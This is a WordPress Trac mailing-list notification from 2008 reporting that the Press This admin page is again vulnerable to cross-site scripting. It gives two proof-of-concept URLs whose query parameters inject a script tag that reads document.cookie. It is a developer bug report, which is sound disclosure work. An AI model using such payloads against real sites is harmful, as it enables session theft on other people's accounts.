[wp-trac] [WordPress Trac] #7220: Press This vulnerabilities
WordPress Trac
wp-trac at lists.automattic.com
Wed Jul 2 00:57:47 GMT 2008
#7220: Press This vulnerabilities
----------------------+-----------------------------------------------------
Reporter: xknown | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone: 2.6
Component: Security | Version: 2.6
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
After the lasts commits, Press This is again vulnerable to XSS.
{{{
http://localhost/wp/wp-admin/press-
this.php/?ajax=video&s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://localhost/wp/wp-admin/press-
this.php/?ajax=thickbox&i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
}}}
--
Ticket URL: <http://trac.wordpress.org/ticket/7220>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list